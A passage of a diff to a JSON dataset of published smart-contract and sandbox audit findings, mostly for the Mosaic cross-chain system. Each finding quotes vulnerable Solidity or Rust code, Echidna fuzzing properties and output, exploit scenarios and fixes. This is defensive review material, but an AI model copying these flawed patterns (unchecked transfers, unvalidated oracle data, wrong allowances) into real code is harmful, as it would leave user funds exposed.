mapping or data structure attributing a percentage of those rewards to a given user. The o-chain relayer service is responsible for holding such mappings and rewarding users with the interest they have accrued upon withdrawal (see the r elayer bot assumptions in the Project Coverage section). Exploit Scenario Investors Alice and Bob, who wish to earn interest on their idle USDC, decide to use the Mosaic system to provide loans. Mosaic invests their money in Aaves lending pool for USDC. However, there is no way for the parties to discern their ownership stakes in the lending pool through the smart contract logic. The owner of the contract decides to call the claim() function and redeem all aUSDC associated with Alices and Bobs positions. When Bob goes to withdraw his funds, he has to trust that the relayer will send him his claim on the aUSDC without any on-chain verication. Recommendations Short term, consider implementing a way to identify the amount of each investors stake in a given investment strategy. Currently, the relayer is responsible for tracking all rewards. Long term, review the privileges and responsibilities of the relayer and architect a more robust solution for managing investments.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: Undetermined" ] }, { - "title": "11. Allocate and remove are not exact inverses of each other ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Due to the rounding logic used in the codebase, when users allocate funds into a system, they may not receive the same amount back when they remove them. When funds are allocated into a system, the values are rounded down (through native truncation) when they are added to the reserves: /// @notice Add to both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to add to the reserve /// @param delStable Amount of stable tokens to add to the reserve /// @param delLiquidity Amount of liquidity created with the provided tokens /// @param blockTimestamp Timestamp used to update cumulative reserves function allocate ( Data storage reserve, uint256 delRisky , uint256 delStable , uint256 delLiquidity , uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky += delRisky.toUint128(); reserve.reserveStable += delStable.toUint128(); reserve.liquidity += delLiquidity.toUint128(); } Figure 11.1: rmm-core/contracts/libraries/Reserve.sol#L70-L87 When funds are removed from the reserves, they are similarly truncated: /// @notice Remove from both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to remove to the reserve /// @param delStable Amount of stable tokens to remove to the reserve /// @param delLiquidity Amount of liquidity removed from total supply /// @param blockTimestamp Timestamp used to update cumulative reserves function remove( Data storage reserve, uint256 delRisky, uint256 delStable, uint256 delLiquidity, uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky -= delRisky.toUint128(); reserve.reserveStable -= delStable.toUint128(); reserve.liquidity -= delLiquidity.toUint128(); } Figure 11.2: rmm-core/contracts/libraries/Reserve.sol#L89-L106 We used the following Echidna property to test this behavior: function check_allocate_remove_inverses( uint256 randomId, uint256 intendedLiquidity, bool fromMargin ) public { AllocateCall memory allocate; allocate.poolId = Addresses.retrieve_created_pool(randomId); retrieve_current_pool_data(allocate.poolId, true ); intendedLiquidity = E2E_Helper.one_to_max_uint64(intendedLiquidity); allocate.delRisky = (intendedLiquidity * precall.reserve.reserveRisky) / precall.reserve.liquidity; allocate.delStable = (intendedLiquidity * precall.reserve.reserveStable) / precall.reserve.liquidity; uint256 delLiquidity = allocate_helper(allocate); // these are calculated the amount returned when remove is called ( uint256 removeRisky, uint256 removeStable) = remove_should_succeed(allocate.poolId, delLiquidity); emit AllocateRemoveDifference(allocate.delRisky, removeRisky); emit AllocateRemoveDifference(allocate.delStable, removeStable); assert (allocate.delRisky == removeRisky); assert (allocate.delStable == removeStable); assert (intendedLiquidity == delLiquidity); } Figure 11.3: rmm-core/contracts/libraries/Reserve.sol#L89-L106 In considering this rounding logic, we used Echidna to calculate the most optimal allocate value for an amount of liquidity, which resulted 1,920,041,647,503 as the dierence in the amount allocated and the amount removed. check_allocate_remove_inverses(uint256,uint256,bool): failed! Call sequence: create_new_pool_should_not_revert(113263940847354084267525170308314,0,12,58,414705177,292070 35433870938731770491094459037949100611312053389816037169023399245174) from: 0x0000000000000000000000000000000000020000 Gas: 0xbebc20 check_allocate_remove_inverses(513288669432172152578276403318402760987129411133329015270396, 675391606931488162786753316903883654910567233327356334685,false) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d Event sequence: Panic(1), Transfer(6361150874), Transfer(64302260917206574294870), AllocateMarginBalance(0, 0, 6361150874, 64302260917206574294870), Transfer(6361150874), Transfer(64302260917206574294870), Allocate(6361150874, 64302260917206574294870), Remove(6361150873, 64302260915286532647367), AllocateRemoveDifference(6361150874, 6361150873), AllocateRemoveDifference( 64302260917206574294870, 64302260915286532647367 ) Figure 11.4: Echidna results Exploit Scenario Alice, a Primitive user, determines a specic amount of liquidity that she wants to put into the system. She calculates the required risky and stable tokens to make the trade, and then allocates the funds to the pool. Due to the rounding direction in the allocate operation and the pool, she receives less than she expected after removing her liquidity. Recommendations Short term, perform additional analysis to determine a safe delta value to allow the allocate and remove operations to happen. Document this issue for end users to ensure that they are aware of the rounding behavior. Long term, use Echidna to test system and mathematical invariants.", + "title": "6. User funds can become trapped in nonstandard token contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "If a users funds are transferred to a token contract that violates the ERC20 standard, the funds may become permanently trapped in that token contract. In the MsgReceiver contract, there are six calls to the transfer() function. See gure 6.1 for an example. function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable onlyOwnerOrRelayer returns ( bool success, bytes memory returnData) { require ( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require (!forwarded[_id], \"call already forwared\" ); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require (balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 6.1: The approveERC20TokenAndForwardCall function in MsgReceiver:98- When implemented in accordance with the ERC20 standard, the transfer() function returns a boolean indicating whether a transfer operation was successful. However, tokens that implement the ERC20 interface incorrectly may not return true upon a successful transfer, in which case the transaction will revert and the users funds will be locked in the token contract. Exploit Scenario Alice, the owner of the MsgReceiverFactory contract, adds a fee token that is controlled by Eve. Eves token contract incorrectly implements the ERC20 interface. Bob interacts with MsgReceiver and calls a function that executes a transfer to _feeReceiver , which is controlled by Eve. Because Eves fee token contract does not provide a return value, Bobs transfer reverts. Recommendations Short term, use safeTransfer() for token transfers and use the SafeERC20 library for interactions with ERC20 token contracts. Long term, develop a process for onboarding new fee tokens. Review our Token Integration Checklist for guidance on the onboarding process. References Missing Return Value Bug", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "12. scaleToX64() and scalefromX64() are not inverses of each other ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Units library provides the scaleToX64() and scalefromX64() helper functions to convert unsigned integers to signed 64x64 xed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts unsigned 256-bit wei value into a fixed point 64.64 number /// @param value Unsigned 256-bit wei amount, in native precision /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Signed 64.64 fixed point number scaled from native precision function scaleToX64 ( uint256 value , uint256 factor ) internal pure returns ( int128 y ) { uint256 scaleFactor = PRECISION / factor; y = value.divu(scaleFactor); } Figure 12.1: rmm-core/contracts/libraries/Units.sol#L35-L42 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu() , which both round downward toward zero. As a result, if a uint256 value is converted to a signed 64x64 xed point and then converted back to a uint256 value, the result will not equal the original uint256 value: /// @notice Converts signed fixed point 64.64 number into unsigned 256-bit wei value /// @param value Signed fixed point 64.64 number to convert from precision of 10^18 /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Unsigned 256-bit wei amount scaled to native precision of 10^(18 - factor) function scalefromX64 ( int128 value , uint256 factor ) internal pure returns ( uint256 y ) { uint256 scaleFactor = PRECISION / factor; y = value.mulu(scaleFactor); } Figure 12.2: rmm-core/contracts/libraries/Units.sol#L44-L51 We used the following Echidna property to test this behavior: function scaleToAndFromX64Inverses (uint256 value , uint256 _decimals ) public { // will enforce factor between 0 - 12 uint256 factor = _decimals % ( 13 ); // will enforce scaledFactor between 1 - 10**12 , because 10**0 = 1 uint256 scaledFactor = 10 **factor; int128 scaledUpValue = value.scaleToX64(scaledFactor); uint256 scaledDownValue = scaledUpValue.scalefromX64(scaledFactor); assert(scaledDownValue == value); } Figure 12.3: contracts/crytic/LibraryMathEchidna.sol scaleToAndFromX64Inverses(uint256,uint256): failed! Call sequence: scaleToAndFromX64Inverses(1,0) Event sequence: Panic(1) Figure 12.4: Echidna results Recommendations Short term, ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.", + "title": "13. Use of MsgReceiver to check _feeToken status leads to unnecessary gas consumption ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Checking the whitelist status of a token only on the receiving end of a message call can lead to excessive gas consumption. As part of a cross-chain message call, all functions in the MsgReceiver contract check whether the token used for the payment to _feeReceiver ( _feeToken ) is a whitelisted token (gure 13.1). Tokens are whitelisted by the owner of the MsgReceiverFactory contract. function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable onlyOwnerOrRelayer returns ( bool success, bytes memory returnData) { require ( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require (!forwarded[_id], \"call already forwared\" ); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require (balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 13.1: The approveERC20TokenAndForwardCall function in M sgReceiver:98-123 This validation should be performed before the MsgSender contract emits the related event (gure 13.2). This is because the relayer will act upon the emitted event on the receiving chain regardless of whether _feeToken is set to a whitelisted token. function registerCrossFunctionCallWithTokenApproval( uint256 _chainId, address _destinationContract, address _feeToken, address _token, uint256 _amount, bytes calldata _methodData ) { external override nonReentrant onlyWhitelistedNetworks(_chainId) onlyUnpausedNetworks(_chainId) whenNotPaused bytes32 id = _generateId(); //shouldn't happen require (hasBeenForwarded[id] == false , \"Call already forwarded\" ); require (lastForwardedCall != id, \"Forwarded last time\" ); lastForwardedCall = id; hasBeenForwarded[id] = true ; emit ForwardCallWithTokenApproval( msg.sender , id, _chainId, _destinationContract, _feeToken , _token, _amount, _methodData ); } Figure 13.2: The registerCrossFunctionCallWithTokenApproval function in M sgSender:169-203 Exploit Scenario On Arbitrum, a low-fee network, Eve creates a theoretically innite series of transactions to be sent to MsgSender , with _feeToken set to a token that she knows is not whitelisted. The relayer relays the series of message calls to a MsgReceiver contract on Ethereum, a high-fee network, and all of the transactions revert. However, the relayer has to pay the intrinsic gas cost for each transaction, with no repayment, while allowing its internal queue to be lled up with malicious transactions. Recommendations Short term, move the logic for token whitelisting and validation to the MsgSender contract. Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "13. getCDF always returns output in the range of (0, 1) ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "CumulativeNormalDistribution provides the getCDF function to calculate an approximation of the cumulative distribution function, which should result in (0, 1] ; however, the getCDF function could return 1 . /// @notice Uses Abramowitz and Stegun approximation: /// https://en.wikipedia.org/wiki/Abramowitz_and_Stegun /// @dev Maximum error: 3.15x10-3 /// @return Standard Normal Cumulative Distribution Function of `x` function getCDF( int128 x) internal pure returns ( int128 ) { int128 z = x.div(CDF3); int128 t = ONE_INT.div(ONE_INT.add(CDF0.mul(z.abs()))); int128 erf = getErrorFunction(z, t); if (z < 0 ) { erf = erf.neg(); } int128 result = (HALF_INT).mul(ONE_INT.add(erf)); return result; } Figure 13.1: rmm-core/contracts/libraries/CumulativeNormalDistribution.sol#L24-L37 We used the following Echidna property to test this behavior. function CDFCheckRange( uint128 x, uint128 neg) public { int128 x_x = realisticCDFInput(x, neg); int128 res = x_x.getCDF(); emit P(x_x, res, res.toInt()); assert (res > 0 && res.toInt() < 1 ); } Figure 13.2: rmm-core/contracts/LibraryMathEchidna.sol CDFCheckRange(uint128,uint128): failed! Call sequence: CDFCheckRange(168951622815827493037,1486973755574663235619590266651) Event sequence: Panic(1), P(168951622815827493037, 18446744073709551616, 1) Figure 13.3: Echidna results Recommendations Short term, perform additional analysis to determine whether this behavior is an issue for the system. Long term, use Echidna to test system and mathematical invariants.", + "title": "14. Active liquidity providers can set arbitrary _tokenOut values when withdrawing liquidity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "An active liquidity provider (LP) can move his or her liquidity into any token, even one that the LP controls. When a relayer acts upon a WithdrawRequest event triggered by an active LP, the MosaicVault contract checks only that the address of _tokenOut (the token being requested) is not the zero address (gure 14.1). Outside of that constraint, _tokenOut can eectively be set to any token, even one that might have vulnerabilities. function _withdraw( address _accountTo, uint256 _amount, address _tokenIn, address _tokenOut, uint256 _amountOutMin, WithdrawData calldata _withdrawData, bytes calldata _data ) internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns ( uint256 withdrawAmount) Figure 14.1: The signature of the _withdraw function in M osaicVault:404-419 This places the burden of ensuring the swaps success on the decentralized exchange, and, as the application grows, can lead to unintended code behavior. Exploit Scenario Eve, a malicious active LP, is able to trigger undened behavior in the system by setting _tokenOut to a token that is vulnerable to exploitation. Recommendations Short term, analyze the implications of allowing _tokenOut to be set to an arbitrary token. Long term, validate the assumptions surrounding the lack of limits on _tokenOut as the codebase grows, and review our Token Integration Checklist to identify any related pitfalls. References imBTC Uniswap Hack", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "14. Lack of data validation on withdrawal operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The withdraw function allows users to specify the recipient to send funds to. Due to a lack of data validation, the address of the engine could be set as the recipient. As a result, the tokens will be transferred directly to the engine itself. /// @inheritdoc IPrimitiveEngineActions function withdraw ( address recipient , uint256 delRisky , uint256 delStable ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins.withdraw(delRisky, delStable); // state update if (delRisky != 0 ) IERC20(risky).safeTransfer(recipient, delRisky); if (delStable != 0 ) IERC20(stable).safeTransfer(recipient, delStable); emit Withdraw( msg.sender , recipient, delRisky, delStable); } Figure 14.1: rmm-core/contracts/PrimitiveEngine.sol#L221-L232 We used the following Echidna property to test this behavior. function withdraw_with_only_non_zero_addr( address recipient, uint256 delRisky, uint256 delStable ) public { require (recipient != address ( 0 )); //ensures that delRisky and delStable are at least 1 and not too large to overflow the deposit delRisky = E2E_Helper.one_to_max_uint64(delRisky); delStable = E2E_Helper.one_to_max_uint64(delStable); MarginHelper memory senderMargins = populate_margin_helper( address ( this )); if (senderMargins.marginRisky < delRisky || senderMargins.marginStable < delStable) { withdraw_should_revert(recipient, delRisky, delStable); } else { withdraw_should_succeed(recipient, delRisky, delStable); } } function withdraw_should_succeed ( address recipient , uint256 delRisky , uint256 delStable ) internal { MarginHelper memory precallSender = populate_margin_helper( address ( this )); MarginHelper memory precallRecipient = populate_margin_helper(recipient); uint256 balanceRecipientRiskyBefore = risky.balanceOf(recipient); uint256 balanceRecipientStableBefore = stable.balanceOf(recipient); uint256 balanceEngineRiskyBefore = risky.balanceOf( address (engine)); uint256 balanceEngineStableBefore = stable.balanceOf( address (engine)); ( bool success , ) = address (engine).call( abi.encodeWithSignature( \"withdraw(address,uint256,uint256)\" , recipient, delRisky, delStable) ); if (!success) { assert( false ); return ; } { assert_post_withdrawal(precallSender, precallRecipient, recipient, delRisky, delStable); //check token balances uint256 balanceRecipientRiskyAfter = risky.balanceOf(recipient); uint256 balanceRecipientStableAfter = stable.balanceOf(recipient); uint256 balanceEngineRiskyAfter = risky.balanceOf( address (engine)); uint256 balanceEngineStableAfter = stable.balanceOf( address (engine)); emit DepositWithdraw( \"balance recip risky\" , balanceRecipientRiskyBefore, balanceRecipientRiskyAfter, delRisky); emit DepositWithdraw( \"balance recip stable\" , balanceRecipientStableBefore, balanceRecipientStableAfter, delStable); emit DepositWithdraw( \"balance engine risky\" , balanceEngineRiskyBefore, balanceEngineRiskyAfter, delRisky); emit DepositWithdraw( \"balance engine stable\" , balanceEngineStableBefore, balanceEngineStableAfter, delStable); assert(balanceRecipientRiskyAfter == balanceRecipientRiskyBefore + delRisky); assert(balanceRecipientStableAfter == balanceRecipientStableBefore + delStable); assert(balanceEngineRiskyAfter == balanceEngineRiskyBefore - delRisky); assert(balanceEngineStableAfter == balanceEngineStableBefore - delStable); } } Figure 14.2: rmm-core/contracts/crytic/E2E_Deposit_Withdrawal.sol withdraw_with_safe_range(address,uint256,uint256): failed! Call sequence: deposit_with_safe_range(0xa329c0648769a73afac7f9381e08fb43dbea72,115792089237316195423570985 008687907853269984665640564039447584007913129639937,5964323976539599410180707317759394870432 1625682232592596462650205581096120955) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d withdraw_with_safe_range(0x48bacb9266a570d521063ef5dd96e61686dbe788,5248038478797710845,748) from: 0x6A4A62E5A7eD13c361b176A5F62C2eE620Ac0DF8 Event sequence: Panic(1), Transfer(5248038478797710846), Transfer(749), Withdraw(5248038478797710846, 749), DepositWithdraw(\"sender risky\", 8446744073709551632, 3198705594911840786, 5248038478797710846), DepositWithdraw(\"sender stable\", 15594018607531992466, 15594018607531991717, 749), DepositWithdraw(\"balance recip risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance recip stable\", 15594018607531992466, 15594018607531992466, 749), DepositWithdraw(\"balance engine risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance engine stable\", 15594018607531992466, 15594018607531992466, 749) Figure 14.3: Echidna results Exploit Scenario Alice, a user, withdraws her funds from the Primitive engine. She accidentally species the address of the recipient as the engine address, and her funds are left stuck in the contract. Recommendations Short term, add a check to ensure that users cannot withdraw to the engine address directly to ensure that users are protected from these mistakes. Long term, use Echidna to test system and mathematical invariants.", + "title": "15. Withdrawal assumptions may lead to transfers of an incorrect token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The CurveTricryptoStrategy contract manages liquidity in Curve pools and facilitates transfers of tokens between chains. While it is designed to work with one curve vault, the vault can be set to an arbitrary pool. Thus, the contract should not make assumptions regarding the pool without validation. Each pool contains an array of tokens specifying the tokens to withdraw from that pool. However, when the vault address is set in the constructor of CurveTricryptoConfig , the pools address is not checked against the TriCrypto pools address. The token at index 2 in the coins array is assumed to be wrapped ether (WETH), as indicated by the code comment shown in gure 15.1. If the conguration is incorrect, a dierent token may be unintentionally transferred. if (unwrap) { //unwrap LP into weth transferredToken = tricryptoConfig.tricryptoLPVault().coins( 2 ); [...] Figure 15.1: Part of the transferLPs function in CurveTricryptoStrategy .sol:377-379 Exploit Scenario The Curve pool array, coins , stores an address other than that of WETH in index 2. As a result, a user mistakenly sends the wrong token in a transfer. Recommendations Short term, have the constructor of CurveTricryptoConfig or the transferLPs function validate that the address of transferredToken is equal to the address of WETH. Long term, validate data from external contracts, especially data involved in the transfer of funds.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "1. The canister sandbox has vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "The canister sandbox codebase uses the following vulnerable or unmaintained Rust dependencies. (All of the crates listed are indirect dependencies of the codebase.) Dependency Version ID", + "title": "16. Improper validation of Chainlink data ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is positive. An overow (e.g., uint(-1) ) would result in drastic misrepresentation of the price and unexpected behavior. In addition, ChainlinkLib does not ensure the completeness or recency of round data, so pricing data may not reect recent changes. It is best practice to dene a window in which data is considered suciently recent (e.g., within a minute of the last update) by comparing the block timestamp to updatedAt . (, int256 price , , , ) = _aggregator.latestRoundData(); return uint256 (price); Figure 16.1: Part of the getCurrentTokenPrice function in ChainlinkLib.sol:113-114 Recommendations Short term, have latestRoundData and similar functions verify that values are non-negative before converting them to unsigned integers, and add an invariant require(updatedAt != 0 && answeredInRound == roundID) to ensure that the round has nished and that the pricing data is from the current round. Long term, dene a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) .", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "2. Complete environment of the replica is passed to the sandboxed process ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When the spawn_socketed_process function spawns a new sandboxed process, the call to the Command::spawn method passes the entire environment of the replica to the sandboxed process. pub fn spawn_socketed_process( exec_path: &str, argv: &[String], socket: RawFd, ) -> std::io::Result { let mut cmd = Command::new(exec_path); cmd.args(argv); // In case of Command we inherit the current process's environment. This should // particularly include things such as Rust backtrace flags. It might be // advisable to filter/configure that (in case there might be information in // env that the sandbox process should not be privy to). // The following block duplicates sock_sandbox fd under fd 3, errors are // handled. unsafe { cmd.pre_exec(move || { let fd = libc::dup2(socket, 3); if fd != 3 { return Err(std::io::Error::last_os_error()); } Ok(()) }) }; let child_handle = cmd.spawn()?; Ok(child_handle) } Figure 2.1: canister_sandbox/common/src/process.rs:17- The DFINITY team does not use environment variables for sensitive information. However, sharing the environment with the sandbox introduces a latent risk that system conguration data or other sensitive data could be leaked to the sandboxed process in the future. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. Since the environment of the replica was leaked to the sandbox when the process was created, the canister gains information about the system that it is running on and learns sensitive information passed as environment variables to the replica, making further eorts to compromise the system easier. Recommendations Short term, add code that lters the environment passed to the sandboxed process (e.g., Command::env_clear or Command::env_remove) to ensure that no sensitive information is leaked if the sandbox is compromised.", + "title": "25. Incorrect safeIncreaseAllowance() amount can cause invest() calls to revert ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Calls to make investments through Sushiswap can revert because the sushiSwapRouter may not have the token allowances needed to fulll the requests. The owner of the MosaicHolding contract is responsible for investing user-deposited funds in investment strategies. The contract owner does this by calling the contracts invest() function, which then calls makeInvestment() on the investment strategy meant to receive the funds (gure 25.1). function invest ( IInvestmentStrategy.Investment[] calldata _investments, address _investmentStrategy , bytes calldata _data ) external override onlyAdmin validAddress(_investmentStrategy) { require (investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\" ); uint256 investmentsLength = _investments.length; address contractAddress = address ( this ); for ( uint256 i ; i < investmentsLength; i++) { IInvestmentStrategy.Investment memory investment = _investments[i]; require (investment.amount != 0 && investment.token != address ( 0 ), \"ERR: TOKEN AMOUNT\" ); IERC20Upgradeable token = IERC20Upgradeable(investment.token); require (token.balanceOf(contractAddress) >= investment.amount, \"ERR: BALANCE\" ); token.safeApprove(_investmentStrategy, investment.amount); } uint256 mintedTokens = IInvestmentStrategy(_investmentStrategy).makeInvestment( _investments, _data ); emit FoundsInvested(_investmentStrategy, msg.sender , mintedTokens); } Figure 25.1: The invest function in MosaicHolding:190- To deposit funds into the SushiswapLiquidityProvider investment strategy, the contract must increase the sushiSwapRouter s approval limits to account for the tokenA and tokenB amounts to be transferred. However, tokenB s approval limit is increased only to the amount of the tokenA investment (gure 25.2). function makeInvestment (Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant returns ( uint256 ) { Investment memory investmentA = _investments[ 0 ]; Investment memory investmentB = _investments[ 1 ]; IERC20Upgradeable tokenA = IERC20Upgradeable(investmentA.token); IERC20Upgradeable tokenB = IERC20Upgradeable(investmentB.token); tokenA.safeTransferFrom( msg.sender , address ( this ), investmentA.amount); tokenB.safeTransferFrom( msg.sender , address ( this ), investmentB.amount); tokenA.safeIncreaseAllowance( address (sushiSwapRouter), investmentA.amount); tokenB.safeIncreaseAllowance( address (sushiSwapRouter), investmentA.amount); ( uint256 deadline , uint256 minA , uint256 minB ) = abi.decode( _data, ( uint256 , uint256 , uint256 ) ); (, , uint256 liquidity ) = sushiSwapRouter.addLiquidity( investmentA.token, investmentB.token, investmentA.amount, investmentB.amount, minA, minB, address ( this ), deadline ); return liquidity; } Figure 25.2: The makeInvestment function in SushiswapLiquidityProvider : 52-85 If the amount of tokenB to be deposited is greater than that of tokenA , sushiSwapRouter will fail to transfer the tokens, and the transaction will revert. Exploit Scenario Alice, the owner of the MosaicHolding contract, wishes to invest liquidity in a Sushiswap liquidity pool. The amount of the tokenB investment is greater than that of tokenA . The sushiSwapRouter does not have the right token allowances for the transaction, and the investment request fails. Recommendations Short term, change the amount value used in the safeIncreaseAllowance() call from investmentA.amount to investmentB.amount . Long term, review the codebase to identify similar issues. Additionally, create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "3. SELinux policy allows the sandbox process to write replica log messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When a new sandboxed process is spawned using Command::spawn, the processs stdin, stdout, and stderr le descriptors are inherited from the parent process. The SELinux policy for the canister sandbox currently allows sandboxed processes to read from and write to all le descriptors inherited from the replica (the le descriptors created by init when the replica is started, as well as the le descriptor used for interprocess RPC). As a result, a compromised sandbox could spoof log messages to the replica's stdout or stderr. # Allow to use the logging file descriptor inherited from init. # This should actually not be allowed, logs should be routed through # replica. allow ic_canister_sandbox_t init_t : fd { use }; allow ic_canister_sandbox_t init_t : unix_stream_socket { read write }; Figure 3.1: guestos/rootfs/prep/ic-node/ic-node.te:312-316 Additionally, sandboxed processes read and write access to les with the tmpfs_t context appears to be overly broad, but considering the fact that sandboxed processes are not allowed to open les, we did not see any way to exploit this. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. By writing fake log messages to the replicas stderr le descriptor, the canister makes it look like the replica has other issues, masking the compromise and making incident response more dicult. Recommendations Short term, change the SELinux policy to disallow sandboxed processes from reading from and writing to the inherited le descriptors stdin, stdout, and stderr.", + "title": "17. Incorrect check of token status in the providePassiveLiquidity function ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "A passive LP can provide liquidity in the form of a token that is not whitelisted. The providePassiveLiquidity() function in MosaicVault is called by users who wish to participate in the Mosaic system as passive LPs. As part of the functions execution, it checks whether there is a ReceiptToken associated with the _tokenAddress input parameter (gure 17.1). This is equivalent to checking whether the token is whitelisted by the system. function providePassiveLiquidity( uint256 _amount, address _tokenAddress) external payable override nonReentrant whenNotPaused { require (_amount > 0 || msg.value > 0 , \"ERR: AMOUNT\" ); if ( msg.value > 0 ) { require ( vaultConfig.getUnderlyingIOUAddress(vaultConfig.wethAddress()) != address ( 0 ), \"ERR: WETH NOT WHITELISTED\" ); _provideLiquidity( msg.value , vaultConfig.wethAddress(), 0 ); } else { require (_tokenAddress != address ( 0 ), \"ERR: INVALID TOKEN\" ); require ( vaultConfig.getUnderlyingIOUAddress(_tokenAddress) != address ( 0 ), \"ERR: TOKEN NOT WHITELISTED\" ); _provideLiquidity(_amount, _tokenAddress, 0 ); } } Figure 17.1: The providePassiveLiquidity function in MosaicVault:127-149 However, providePassiveLiquidity() uses an incorrect function call to check the whitelist status. Instead of calling getUnderlyingReceiptAddress() , it calls getUnderlyingIOUAddress() . The same issue occurs in checks of WETH deposits. Exploit Scenario Eve decides to deposit liquidity in the form of a token that is whitelisted only for active LPs. The token provides a higher yield than the tokens whitelisted for passive LPs. This may enable Eve to receive a higher annual percentage yield on her deposit than other passive LPs in the system receive on theirs. Recommendations Short term, change the function called to validate tokenAddress and wethAddress from getUnderlyingIOUAddress() to getUnderlyingReceiptAddress() . Long term, take the following steps: Review the codebase to identify similar errors. Consider whether the assumption that the same tokens will be whitelisted for both passive and active LPs will hold in the future. Create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2030,29 +4800,29 @@ ] }, { - "title": "4. Canister sandbox system calls are not ltered using Seccomp ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "Seccomp provides a framework to lter outgoing system calls. Using Seccomp, a process can limit the type of system calls available to it, thereby limiting the available attack surface of the kernel. The current implementation of the canister sandbox does not use Seccomp; instead, it relies on mandatory access controls (via SELinux) to restrict the system calls available to a sandboxed process. While SELinux is useful for restricting access to les, directories, and other processes, Seccomp provides more ne-grained control over kernel system calls and their arguments. For this reason, Seccomp (in particular, Seccomp-BPF) is a useful complement to SELinux in restricting a sandboxed processs access to the system. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed 